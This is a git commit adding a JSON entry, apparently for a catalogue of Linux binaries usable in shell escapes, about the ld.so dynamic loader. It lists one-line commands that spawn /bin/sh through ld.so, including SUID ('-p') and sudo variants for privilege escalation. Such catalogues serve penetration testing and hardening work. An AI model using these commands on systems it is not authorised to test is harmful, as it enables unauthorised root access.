add data for ld.so

master
t0thkr1s 4 years ago
parent 99b5a302d7
commit af05253a14

@ -0,0 +1,20 @@
{
"description": "'ld.so' is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with:\n```\n$ strings /proc/self/exe | head -1\n/lib64/ld-linux-x86-64.so.2\n```",
"functions": {
"shell": [
{
"code": "/lib/ld.so /bin/sh"
}
],
"suid": [
{
"code": "./ld.so /bin/sh -p"
}
],
"sudo": [
{
"code": "sudo /lib/ld.so /bin/sh"
}
]
}
}
Loading…
Cancel
Save